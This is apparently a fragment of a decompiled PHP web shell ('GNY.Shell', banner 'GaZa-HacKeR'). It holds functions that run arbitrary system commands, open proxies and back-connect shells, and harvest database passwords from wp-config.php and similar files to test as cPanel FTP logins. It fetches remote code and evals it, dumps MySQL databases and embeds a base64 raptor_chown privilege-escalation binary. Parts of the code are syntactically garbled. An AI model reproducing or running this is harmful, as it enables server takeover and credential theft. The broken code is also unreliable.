:: Uitgeverij Tab ::

  _____ _   ___     __ _____ _          _ _ \r\n / ____| \\ | \\ \\   / // ";
    echo "____| |        | | |\r\n| |                           |__   ___| | |\r\nGaZa-HacKeR\r\n| |__| | |\\  |  | | _ ____) | | | |  __/ | |\r\n \\_____|_| \\_|  |_|(_)_____/|_| |_|\\___|_|_|

\r\n \r\n

$host:6543

Note: If '$host' has a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.

"; } else { $_POST['proxyhostmsg'] = "

Failed!

Note: If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.

"; } } function cf( $fname, $text ) { ( $w_file = fopen( $fname, "w" ) ) || err( ); if ( $w_file ) { fputs( $w_file, base64_decode( $text ) ); @fclose( $w_file ); } } function cfb( $fname, $text ) { ( $w_file = fopen( $fname, "w" ) ) || bberr( ); if ( $w_file ) { fputs( $w_file, base64_decode( $text ) ); @fclose( $w_file ); } } function err( ) { $_POST['backcconnmsge'] = "

Error: Can't connect!"; } function bberr( ) { $_POST['backcconnmsge'] = "

Error: Can't backdoor host!"; } function which( $pr ) { $path = ex( "which $pr" ); if ( !isset( $path ) ) { return $path; } else { return $pr; } } function ex( $cfe ) { $res = ""; if ( !isset( $cfe ) ) { if ( function_exists( "exec" ) ) { @exec( $cfe, &$res ); $res = join( "\n", $res ); } else if ( function_exists( "shell_exec" ) ) { $res = shell_exec( $cfe ); } else if ( function_exists( "system" ) ) { @ob_start( ); @system( $cfe ); $res = ob_get_contents( ); @ob_end_clean( ); } else if ( function_exists( "passthru" ) ) { @ob_start( ); @passthru( $cfe ); $res = ob_get_contents( ); @ob_end_clean( ); } else if ( is_resource( $f = popen( $cfe, "r" ) ) ) { $res = ""; while ( !feof( $f ) ) { $res .= fread( $f, 1024 ); } @pclose( $f ); } } return $res; } function getmicrotime( ) { $sec = explode( " ", microtime( ) )[1]; $usec = explode( " ", microtime( ) )[0]; return ( double )$usec + ( double )$sec; } function strips( &$arr, $k = "" ) { if ( is_array( $arr ) ) { foreach ( $arr as $k=>$v ) { if ( strtoupper( $k ) != "GLOBALS" ) { continue; } else { strips( $arr["$k"] ); } } } else { $arr = stripslashes( $arr ); } } function dosyayicek( $link, $file ) { $fp = fopen( $link, "r" ); while ( !feof( $fp ) ) { $cont .= fread( $fp, 1024 ); } fclose( $fp ); $fp2 = fopen( $file, "w" ); fwrite( $fp2, $cont ); fclose( $fp2 ); } function buff_prepare( ) { global $sess_data; global $act; foreach ( $sess_data['copy'] as $k=>$v ) { $sess_data['copy'][$k] = str_replace( "\\", DIRECTORY_SEPARATOR, realpath( $v ) ); } foreach ( $sess_data['cut'] as $k=>$v ) { $sess_data['cut'][$k] = str_replace( "\\", DIRECTORY_SEPARATOR, realpath( $v ) ); } $sess_data['copy'] = array_unique( $sess_data['copy'] ); $sess_data['cut'] = array_unique( $sess_data['cut'] ); sort( &$sess_data['copy'] ); sort( &$sess_data['cut'] ); if ( $act != "copy" ) { foreach ( $sess_data['cut'] as $k=>$v ) { if ( $sess_data['copy'][$k] == $v ) { continue; } else { } } } foreach ( $sess_data['copy'] as $k=>$v ) { if ( $sess_data['cut'][$k] == $v ) { continue; } else { } } } function sess_put( $data ) { global $sess_cookie; global $sess_data; buff_prepare( ); $sess_data = $data; $data = serialize( $data ); setcookie( $sess_cookie, $data ); } function str2mini( $content, $len ) { if ( $len < strlen( $content ) ) { $len = ceil( $len / 2 ) - 2; return substr( $content, 0, $len )."...".substr( $content, 0 - $len ); } else { return $content; } } function view_size( $size ) { if ( !is_numeric( $size ) ) { return FALSE; } else if ( 1073741824 <= $size ) { $size = round( $size / 1073741824 * 100 ) / 100." GB"; } else if ( 1048576 <= $size ) { $size = round( $size / 1048576 * 100 ) / 100." MB"; } else if ( 1024 <= $size ) { $size = round( $size / 1024 * 100 ) / 100." KB"; } else { $size .= " B"; } return $size; } function fs_copy_dir( $d, $t ) { $d = str_replace( "\\", DIRECTORY_SEPARATOR, $d ); if ( substr( $d, -1 ) != DIRECTORY_SEPARATOR ) { $d .= DIRECTORY_SEPARATOR; } $h = opendir( $d ); while ( ( $o = readdir( $h ) ) !== FALSE ) { if ( $o != "." && $o != ".." ) { continue; } else { if ( !is_dir( $d.DIRECTORY_SEPARATOR.$o ) ) { $ret = copy( $d.DIRECTORY_SEPARATOR.$o, $t.DIRECTORY_SEPARATOR.$o ); } else { $ret = mkdir( $t.DIRECTORY_SEPARATOR.$o ); fs_copy_dir( $d.DIRECTORY_SEPARATOR.$o, $t.DIRECTORY_SEPARATOR.$o ); } if ( !$ret ) { continue; } else { return $ret; } } } closedir( $h ); return TRUE; } function fs_copy_obj( $d, $t ) { $d = str_replace( "\\", DIRECTORY_SEPARATOR, $d ); $t = str_replace( "\\", DIRECTORY_SEPARATOR, $t ); if ( !is_dir( dirname( $t ) ) ) { mkdir( dirname( $t ) ); } if ( is_dir( $d ) ) { if ( substr( $d, -1 ) != DIRECTORY_SEPARATOR ) { $d .= DIRECTORY_SEPARATOR; } if ( substr( $t, -1 ) != DIRECTORY_SEPARATOR ) { $t .= DIRECTORY_SEPARATOR; } return fs_copy_dir( $d, $t ); } else if ( is_file( $d ) ) { return copy( $d, $t ); } else { return FALSE; } } function fs_move_dir( $d, $t ) { $h = opendir( $d ); if ( !is_dir( $t ) ) { mkdir( $t ); } while ( ( $o = readdir( $h ) ) !== FALSE ) { if ( $o != "." && $o != ".." ) { continue; } else { $ret = TRUE; if ( !is_dir( $d.DIRECTORY_SEPARATOR.$o ) ) { $ret = copy( $d.DIRECTORY_SEPARATOR.$o, $t.DIRECTORY_SEPARATOR.$o ); } else if ( mkdir( $t.DIRECTORY_SEPARATOR.$o ) && fs_copy_dir( $d.DIRECTORY_SEPARATOR.$o, $t.DIRECTORY_SEPARATOR.$o ) ) { $ret = FALSE; } if ( !$ret ) { continue; } else { return $ret; } } } closedir( $h ); return TRUE; } function fs_move_obj( $d, $t ) { $d = str_replace( "\\", DIRECTORY_SEPARATOR, $d ); $t = str_replace( "\\", DIRECTORY_SEPARATOR, $t ); if ( is_dir( $d ) ) { if ( substr( $d, -1 ) != DIRECTORY_SEPARATOR ) { $d .= DIRECTORY_SEPARATOR; } if ( substr( $t, -1 ) != DIRECTORY_SEPARATOR ) { $t .= DIRECTORY_SEPARATOR; } return fs_move_dir( $d, $t ); } else if ( is_file( $d ) ) { if ( copy( $d, $t ) ) { return unlink( $d ); } else { unlink( $t ); return FALSE; } else { return FALSE; } } } function fs_rmdir( $d ) { $h = opendir( $d ); while ( ( $o = readdir( $h ) ) !== FALSE ) { if ( $o != "." && $o != ".." ) { continue; } else { if ( !is_dir( $d.$o ) ) { unlink( $d.$o ); continue; } else { fs_rmdir( $d.$o.DIRECTORY_SEPARATOR ); rmdir( $d.$o ); } } } closedir( $h ); rmdir( $d ); return !is_dir( $d ); } function fs_rmobj( $o ) { $o = str_replace( "\\", DIRECTORY_SEPARATOR, $o ); if ( is_dir( $o ) ) { if ( substr( $o, -1 ) != DIRECTORY_SEPARATOR ) { $o .= DIRECTORY_SEPARATOR; } return fs_rmdir( $o ); } else if ( is_file( $o ) ) { return unlink( html_entity_decode( $o ) ); } else { return FALSE; } } function myshellexec( for ( ;$cmd ) { global $disablefunc, $result = "", if ( !isset( $cmd ) ) { if ( is_callable( "exec" ) && !in_array( "exec", $disablefunc ) ) { exec( $cmd, &$result ), $result = join( "\n", $result ), ( $result = shell_exec( "$cmd" ) ) !== FALSE; } } else if ( is_callable( "system" ) && !in_array( "system", $disablefunc ) ) { $v = ob_get_contents( ), @ob_clean( ), system( $cmd ), $result = ob_get_contents( ), @ob_clean( ), echo $v, } else if ( is_callable( "passthru" ) && !in_array( "passthru", $disablefunc ) ) { $v = ob_get_contents( ), @ob_clean( ), passthru( $cmd ), $result = ob_get_contents( ), @ob_clean( ), echo $v, } else if ( is_resource( $fp = popen( $cmd, "r" ) ) ) { $result = "", while ( !feof( $fp ) ) { $result .= fread( $fp, 1024 ), } pclose( $fp ), } } ) { return $result; } function tabsort( $a, $b ) { global $v; return strnatcmp( $a[$v], $b[$v] ); } function view_perms( $mode ) { if ( ( $mode & 49152 ) === 49152 ) { $type = "s"; } else if ( ( $mode & 16384 ) === 16384 ) { $type = "d"; } else if ( ( $mode & 40960 ) === 40960 ) { $type = "l"; } else if ( ( $mode & 32768 ) === 32768 ) { $type = "-"; } else if ( ( $mode & 24576 ) === 24576 ) { $type = "b"; } else if ( ( $mode & 8192 ) === 8192 ) { $type = "c"; } else if ( ( $mode & 4096 ) === 4096 ) { $type = "p"; } else { $type = "?"; } $owner['read'] = $mode & 256 ? "r" : "-"; $owner['write'] = $mode & 128 ? "w" : "-"; $owner['execute'] = $mode & 64 ? "x" : "-"; $group['read'] = $mode & 32 ? "r" : "-"; $group['write'] = $mode & 16 ? "w" : "-"; $group['execute'] = $mode & 8 ? "x" : "-"; $world['read'] = $mode & 4 ? "r" : "-"; $world['write'] = $mode & 2 ? "w" : "-"; $world['execute'] = $mode & 1 ? "x" : "-"; if ( $mode & 2048 ) { $owner['execute'] = $owner['execute'] == "x" ? "s" : "S"; } if ( $mode & 1024 ) { $group['execute'] = $group['execute'] == "x" ? "s" : "S"; } if ( $mode & 512 ) { $world['execute'] = $world['execute'] == "x" ? "t" : "T"; } return $type.join( "", $owner ).join( "", $group ).join( "", $world ); } function posix_getpwuid( $uid ) { return FALSE; } function posix_getgrgid( $gid ) { return FALSE; } function posix_kill( $gid ) { return FALSE; } function parse_perms( $mode ) { if ( ( $mode & 49152 ) === 49152 ) { $t = "s"; } else if ( ( $mode & 16384 ) === 16384 ) { $t = "d"; } else if ( ( $mode & 40960 ) === 40960 ) { $t = "l"; } else if ( ( $mode & 32768 ) === 32768 ) { $t = "-"; } else if ( ( $mode & 24576 ) === 24576 ) { $t = "b"; } else if ( ( $mode & 8192 ) === 8192 ) { $t = "c"; } else if ( ( $mode & 4096 ) === 4096 ) { $t = "p"; } else { $t = "?"; } $o['r'] = 0 < ( $mode & 256 ); $o['w'] = 0 < ( $mode & 128 ); $o['x'] = 0 < ( $mode & 64 ); $g['r'] = 0 < ( $mode & 32 ); $g['w'] = 0 < ( $mode & 16 ); $g['x'] = 0 < ( $mode & 8 ); $w['r'] = 0 < ( $mode & 4 ); $w['w'] = 0 < ( $mode & 2 ); $w['x'] = 0 < ( $mode & 1 ); return array( "t"=>$t, "o"=>$o, "g"=>$g, "w"=>$w ); } function parsesort( $sort ) { $one = intval( $sort ); $second = substr( $sort, -1 ); if ( $second != "d" ) { $second = "a"; } return array( , $second ); } function view_perms_color( $o ) { if ( !is_readable( $o ) ) { return "".view_perms( fileperms( $o ) ).""; } else if ( !is_writable( $o ) ) { return "".view_perms( fileperms( $o ) ).""; } else { return "".view_perms( fileperms( $o ) ).""; } } function getsource( $fn ) { global $GNY_sourcesurl; $array = array( "GNY_bindport.pl"=>"GNY_bindport_pl.txt", "GNY_bindport.c"=>"GNY_bindport_c.txt", "GNY_backconn.pl"=>"GNY_backconn_pl.txt", "GNY_backconn.c"=>"GNY_backconn_c.txt", "GNY_datapipe.pl"=>"GNY_datapipe_pl.txt", "GNY_datapipe.c"=>"GNY_datapipe_c.txt" ); $name = $array[$fn]; if ( $name ) { return file_get_contents( $GNY_sourcesurl.$name ); } else { return FALSE; } } function sh_getupdate( $update = "TRUE" ) { $url = $GNY_updateurl."?version=".urlencode( base64_encode( $shver ) )."&updatenow=".( $updatenow ? "1" : "0" )."&"; $data = file_get_contents( $url ); if ( !$data ) { return "Can't connect to update-server!"; } $data = ltrim( $data ); $string = substr( $data, 3, ord( $data[2] ) ); if ( $data[0] == "™" && $data[1] == "%01" ) { return "Error: ".$string; return FALSE; } if ( $data[0] == "™" && $data[1] == "%02" ) { return "You are using latest version!"; } if ( $data[0] == "™" && $data[1] == "%03" ) { $string = explode( "%01", $string ); if ( $update ) { $confvars = array( ); $sourceurl = $string[0]; $source = file_get_contents( $sourceurl ); if ( !$source ) { return "Can't fetch update!"; } $fp = fopen( "D:\\Hacker\\CD3\\ÇÏæÇÊ ÇáÇÎÊÑÇÞ\\gaza.php", "w" ); if ( !$fp ) { return "Local error: can't write update to D:\\Hacker\\CD3\\ÇÏæÇÊ ÇáÇÎÊÑÇÞ\\gaza.php!"; } fwrite( $fp, $source ); fclose( $fp ); return "Thanks! Updated successfully."; return "New version is available: ".$string[1]; } else if ( $data[0] == "™" && $data[1] == "%04" ) { eval( $string ); return 1; } else { return "Error in protocol: segmentation failed! (".$data.") "; } } function mysql_dump( $set ) { global $shver; $sock = $set['sock']; $db = $set['db']; $print = $set['print']; $nl2br = $set['nl2br']; $file = $set['file']; $add_drop = $set['add_drop']; $tabs = $set['tabs']; $onlytabs = $set['onlytabs']; $ret = array( ); $ret['err'] = array( ); if ( !is_resource( $sock ) ) { echo "Error: \$sock is not valid resource."; } if ( isset( $db ) ) { $db = "db"; } if ( isset( $print ) ) { $print = 0; } if ( isset( $nl2br ) ) { $nl2br = 0; } if ( isset( $add_drop ) ) { $add_drop = TRUE; } if ( isset( $file ) ) { $file = $tmpdir."dump_".getenv( "SERVER_NAME" )."_".$db."_".date( "d-m-Y-H-i-s" ).".sql"; } if ( !is_array( $tabs ) ) { $tabs = array( ); } if ( isset( $add_drop ) ) { $add_drop = TRUE; } if ( sizeof( $tabs ) == 0 ) { $res = mysql_query( "SHOW TABLES FROM ".$db, $sock ); do { if ( 0 < mysql_num_rows( $res ) && ( $row = mysql_fetch_row( $res ) ) ) { $Var_105[$tabs] = $row[0]; } } while( 1 ); } $out = "# MySQL Database Dump - GNY.Shell \r\n#\r\n# Host settings: \r\n# MySQL version: (".mysql_get_server_info( ).") running on ".getenv( "SERVER_ADDR" )." (".getenv( "SERVER_NAME" ).")"." \r\n# Date: ".date( "d.m.Y H:i:s" )." \r\n# Database: \"".$db."\" \r\n#--------------------------------------------------------- \r\n"; $c = count( $onlytabs ); foreach ( $tabs as $tab ) { if ( in_array( $tab, $onlytabs ) || !$c ) { continue; } else { if ( $add_drop ) { $out .= "DROP TABLE IF EXISTS `".$tab."`;\n"; } $res = mysql_query( "SHOW CREATE TABLE `".$tab."`", $sock ); if ( !$res ) { $Var_159[$ret['err']] = mysql_smarterror( ); continue; } $row = mysql_fetch_row( $res ); $out .= $row['1'].";\n\n"; $res = mysql_query( "SELECT * FROM `$tab`", $sock ); do { if ( !( 0 < mysql_num_rows( $res ) ) || !( $row = mysql_fetch_assoc( $res ) ) ) { continue; } else { $keys = implode( "`, `", array_keys( $row ) ); $values = array_values( $row ); foreach ( $values as $k=>$v ) { $values[$k] = addslashes( $v ); } $values = implode( "', '", $values ); $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; $out .= $sql; continue; } } while( 1 ); } } $out .= "#---------------------------------------------------------------------------------\n\n"; if ( $file ) { $fp = fopen( $file, "w" ); if ( !$fp ) { $Var_236[$ret['err']] = 2; } else { fwrite( $fp, $out ); fclose( $fp ); } } if ( $print ) { if ( $nl2br ) { echo nl2br( $out ); } else { echo $out; } } return $out; } function mysql_buildwhere( $array, $sep = " and", $functs = Const Array{ if ( !is_array( $array ) ) { $array = array( ); } $result = ""; foreach ( $array as $k=>$v ) { $value = ""; if ( !isset( $functs[$k] ) ) { $value .= $functs[$k]."("; } $value .= "'".addslashes( $v )."'"; if ( !isset( $functs[$k] ) ) { $value .= ")"; } $result .= "`".$k."` = ".$value.$sep; } $result = substr( $result, 0, strlen( $result ) - strlen( $sep ) ); return $result; } function mysql_fetch_all( $query, $sock ) { if ( $sock ) { $result = mysql_query( $query, $sock ); } else { $result = mysql_query( $query ); } $array = array( ); while ( $row = mysql_fetch_array( $result ) ) { $Var_20[$array] = $row; } mysql_free_result( $result ); return $array; } function mysql_smarterror( $type, $sock ) { if ( $sock ) { $error = mysql_error( $sock ); } else { $error = mysql_error( ); } $error = htmlspecialchars( $error ); return $error; } function mysql_query_form( ) { global $submit; global $sql_act; global $sql_query; global $sql_query_result; global $sql_confirm; global $sql_query_error; global $tbl_struct; if ( $submit && !$sql_query_result && $sql_confirm ) { if ( !$sql_query_error ) { $sql_query_error = "Query was empty"; } echo "Error:
".$sql_query_error."
"; } if ( $sql_query_result || !$sql_confirm ) { $sql_act = $sql_goto; } if ( !$submit || $sql_act ) { echo "

Fields:
"; foreach ( $tbl_struct as $field ) { $name = $field['Field']; echo "+ ".$name."
"; } echo "

"; } } if ( $sql_query_result || !$sql_confirm ) { $sql_query = $sql_last_query; } } function mysql_create_db( $db, $sock = "" ) { $sql = "CREATE DATABASE `".addslashes( $db )."`;"; if ( $sock ) { return mysql_query( $sql, $sock ); } else { return mysql_query( $sql ); } } function mysql_query_parse( $query ) { $query = trim( $query ); $arr = explode( " ", $query ); $types = array( "SELECT"=>array( 3, 1 ), "SHOW"=>array( 2, 1 ), "DELETE"=>array( 1 ), "DROP"=>array( 1 ) ); $result = array( ); $op = strtoupper( $arr[0] ); if ( is_array( $types[$op] ) ) { $result['propertions'] = $types[$op]; $result['query'] = $query; if ( $types[$op] == 2 ) { foreach ( $arr as $k=>$v ) { if ( strtoupper( $v ) == "LIMIT" ) { continue; } else { $result['limit'] = $arr[$k + 1]; $result['limit'] = explode( ",", $result['limit'] ); if ( count( $result['limit'] ) == 1 ) { $result['limit'] = array( 0, $result['limit'][0] ); } } } } } else { return FALSE; } } function fsearch( $d ) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if ( substr( $d, -1 ) != DIRECTORY_SEPARATOR ) { $d .= DIRECTORY_SEPARATOR; } $h = opendir( $d ); while ( ( $f = readdir( $h ) ) !== FALSE ) { if ( $f != "." && $f != ".." ) { continue; } else { $bool = isset( $a['name_regexp'] ) && strpos( $f, $a['name'] ) !== FALSE || $a['name_regexp'] && ereg( $a['name'], $f ); if ( is_dir( $d.$f ) ) { ++$search_i_d; if ( isset( $a['text'] ) && $bool ) { $Var_64[$found] = $d.$f; ++$found_d; } if ( !is_link( $d.$f ) ) { continue; } else { fsearch( $d.$f ); } continue; } ++$search_i_f; if ( $bool ) { continue; } else { if ( !isset( $a['text'] ) ) { $r = file_get_contents( $d.$f ); if ( $a['text_wwo'] ) { $a['text'] = " ".trim( $a['text'] )." "; } if ( !$a['text_cs'] ) { $a['text'] = strtolower( $a['text'] ); $r = strtolower( $r ); } if ( $a['text_regexp'] ) { $bool = ereg( $a['text'], $r ); } else { $bool = strpos( " ".$r, $a['text'], 1 ); } if ( $a['text_not'] ) { $bool = !$bool; } if ( $bool ) { continue; } else { $Var_140[$found] = $d.$f; ++$found_f; } continue; } else { $Var_148[$found] = $d.$f; ++$found_f; } } } } closedir( $h ); } function onphpshutdown( ) { global $gzipencode; global $ft; if ( !headers_sent( ) && $gzipencode && !in_array( $ft, array( "img", "download", "notepad" ) ) ) { $v = ob_get_contents( ); @ob_end_clean( ); @ob_start( "ob_gzHandler" ); echo $v; @ob_end_flush( ); } } function gnyexit( ) { onphpshutdown( ); exit( ); } function displaysecinfo( $name, $value ) { if ( !isset( $value ) ) { if ( !isset( $name ) ) { $name = "".$name." - "; } echo $name.nl2br( $value )."
"; } } function read_dir( $path, $username ) { do { do { if ( ( $handle = opendir( $path ) ) && false !== ( $file = readdir( $handle ) ) ) { $fpath = "$path$file"; } } while ( !( $file != "." && $file != ".." ) || is_readable( $fpath ) ); $dr = "$fpath/"; if ( is_dir( $dr ) ) { read_dir( $dr, $username ); continue; } else if ( $file == "config.php" || $file == "config.inc.php" || $file == "db.inc.php" || $file == "connect.php" || $file == "wp-config.php" || $file == "var.php" || $file == "configure.php" || $file == "db.php" || $file == "db_connect.php" ) { continue; } else { $pass = get_pass( $fpath ); if ( $pass != "" ) { continue; } else { echo "[+] $fpath\ $pass\ "; ftp_check( $username, $pass ); } } } while( 1 ); } function get_pass( $link ) { $config = fopen( $link, "r" ); while ( !feof( $config ) ) { $line = fgets( $config ); if ( strstr( $line, "pass" ) || strstr( $line, "password" ) || strstr( $line, "passwd" ) ) { continue; } else { if ( strrpos( $line, "\"" ) ) { $pass = substr( $line, strpos( $line, "=" ) + 3, strrpos( $line, "\"" ) - ( strpos( $line, "=" ) + 3 ) ); } else { $pass = substr( $line, strpos( $line, "=" ) + 3, strrpos( $line, "'" ) - ( strpos( $line, "=" ) + 3 ) ); } return $pass; } } } function ftp_check( $login, $pass ) { $ftp = ftp_connect( "127.0.0.1" ); if ( $ftp ) { $res = ftp_login( $ftp, $login, $pass ); if ( $res ) { echo "[cPanel Found] ".$login.":".$pass." Success\n"; } else { ftp_quit( $ftp ); } } } $Lversion = php_uname( r ); $OSV = php_uname( s ); if ( eregi( "Linux", $OSV ) ) { $Lversion = substr( $Lversion, 0, 6 ); $millink = "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion; $stormlink = "http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+".$Lversion; } else { $Lversion = substr( $Lversion, 0, 3 ); $millink = "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; $stormlink = "http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=".$OSV."+".$Lversion; } if ( !function_exists( "myshellexec" ) ) { if ( is_callable( "popen" ) ) { } else { } } $raptorchown = "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\r\nQ29weXJpZ2h0IChjKSAyMDA0IE1hcmNvIEl2YWxkaSA8cmFwdG9yQDB4ZGVhZGJlZWYuaW5mbz4A\r\nAAAAAAAAAHJhcHRvcl9jaG93bi5jIC0gc3lzX2Nob3duIG1pc3NpbmcgREFDIGNvbnRyb2xzIG9u\r\nIExpbnV4ACVzCiVzCgoAdXNhZ2U6ICVzIGZpbGVfbmFtZQoKAEVycm9yOiBOb3QgdnVsbmVyYWJs\r\nZSEKAEVycm9yAE5pbnBvdTogc3lzX2Nob3duIG5vIGp1dHN1IQoAL2Jpbi9scyAtbCAlcwAAAAAA\r\nAAAAAOSYBAgAAAAAAQAAAAEAAAAMAAAAnIMECA0AAADIhgQIBAAAAEiBBAgFAAAAYIIECAYAAACQ\r\ngQQICgAAAJcAAAALAAAAEAAAABUAAAAAAAAAAwAAAOyYBAgCAAAASAAAABQAAAARAAAAFwAAAFSD\r\nBAgRAAAARIMECBIAAAAQAAAAEwAAAAgAAAD+//9vFIMECP///28BAAAA8P//b/iCBAgAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAA\r\nAAAAABCYBAgAAAAAAAAAAMqDBAjagwQI6oMECPqDBAgKhAQIGoQECCqEBAg6hAQISoQECAAAAAAA\r\nR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH\r\nQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD\r\nQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAALnN5\r\nbXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5bnN5\r\nbQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAu\r\naW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA\r\nLmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAAAAAj\r\nAAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEECEgB\r\nAABIAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAJCBBAiQAQAA0AAAAAUAAAABAAAABAAA\r\nABAAAAA/AAAAAwAAAAIAAABgggQIYAIAAJcAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28CAAAA\r\n+IIECPgCAAAaAAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAABSDBAgUAwAAMAAAAAUAAAAB\r\nAAAABAAAAAAAAABjAAAACQAAAAIAAABEgwQIRAMAABAAAAAEAAAAAAAAAAQAAAAIAAAAbAAAAAkA\r\nAAACAAAAVIMECFQDAABIAAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAJyDBAicAwAAFwAA\r\nAAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAC0gwQItAMAAKAAAAAAAAAAAAAAAAQAAAAEAAAA\r\newAAAAEAAAAGAAAAVIQECFQEAAB0AgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiGBAjI\r\nBgAAGwAAAAAAAAAAAAAABAAAAAAAAACHAA